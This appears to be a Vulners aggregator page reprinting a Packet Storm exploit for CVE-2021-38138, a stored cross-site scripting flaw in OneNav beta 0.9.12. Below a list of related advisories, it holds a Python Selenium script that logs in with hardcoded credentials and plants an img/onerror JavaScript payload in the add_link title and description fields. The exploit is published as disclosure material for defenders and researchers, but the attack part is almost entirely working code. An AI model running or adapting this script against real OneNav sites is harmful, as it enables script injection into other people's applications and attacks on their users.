Lucene search
K

OneNav Beta 0.9.12 Cross Site Scripting

🗓️ 07 Aug 2021 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 281 Views

OneNav beta 0.9.12 XSS vulnerability in add_lin

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-38138
6 Aug 202100:00
attackerkb
Circl
CVE-2021-38138
5 Aug 202120:31
circl
CNNVD
OneNav 跨站脚本漏洞
5 Aug 202100:00
cnnvd
CVE
CVE-2021-38138
5 Aug 202115:59
cve
Cvelist
CVE-2021-38138
5 Aug 202115:59
cvelist
EUVD
EUVD-2021-24611
7 Oct 202500:30
euvd
NVD
CVE-2021-38138
5 Aug 202116:15
nvd
Prion
Design/Logic Flaw
5 Aug 202116:15
prion
Positive Technologies
PT-2021-21960 · Onenav · Onenav
5 Aug 202100:00
ptsecurity
RedhatCVE
CVE-2021-38138
22 May 202520:08
redhatcve
Rows per page
`# Exploit Title: XSS-Stored - Brutal PWNED on OneNav beta 0.9.12 add_link feature  
# Author: nu11secur1ty  
# Testing and Debugging: nu11secur1ty $ g3ck0dr1v3r  
# Date: 08.06.2021  
# Vendor: https://www.xiaoz.me/  
# Link: https://github.com/helloxz/onenav/releases/tag/0.9.12  
# CVE: CVE-2021-38138  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug and Developement: nu11secur1ty & g3ck0dr1v3r  
# CVE-2021-38138  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="http://192.168.1.120/index.php?c=login"  
  
#enter your login username  
username="xiaoz"  
  
#enter your login password  
password="xiaoz.me"  
  
#enter the element for username input field  
element_for_username="user"  
#enter the element for password input field  
element_for_password="password"  
#enter the element for submit button  
element_for_submit="layui-btn"  
  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_class_name(element_for_submit)  
signInButton.click()  
  
# Exploit PWNED HTTP Traffic is not filtered. It was a lot of fun :D  
time.sleep(3)  
browser.get(("http://192.168.1.120/index.php?c=admin&page=add_link"))  
time.sleep(3)  
browser.execute_script("document.querySelector('[name=\"url\"]').value = '  
http://192.168.1.120/index.php?c=admin&page=add_link'")  
time.sleep(3)  
browser.execute_script("document.querySelector('[name=\"title\"]').value =  
'</span><img src=  
https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif  
<a href=http://example.com/> onerror=alert(1) /><span>'")  
  
#button1  
browser.execute_script("document.querySelector('[class=\"layui-edge\"]').click()")  
time.sleep(1)  
  
# button2 using $ because querySelector cannot parse dd selector  
browser.execute_script("$('dd[lay-value=19]').click()")  
  
time.sleep(1)  
browser.execute_script("document.querySelector('[name=\"description\"]').value  
= '</span><img src=  
https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif  
<a href=http://example.com/> onerror=alert(1) /><span>'")  
  
#submit button3  
browser.execute_script("document.querySelector('[class=\"layui-btn\"]').click()")  
time.sleep(1)  
browser.maximize_window()  
browser.get(("http://192.168.1.120/index.php?c=admin&page=link_list"))  
  
print("payload is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
  
----------------------------------------------------------------------------------------  
  
# Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38138  
# Proof: https://streamable.com/ubtzio  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation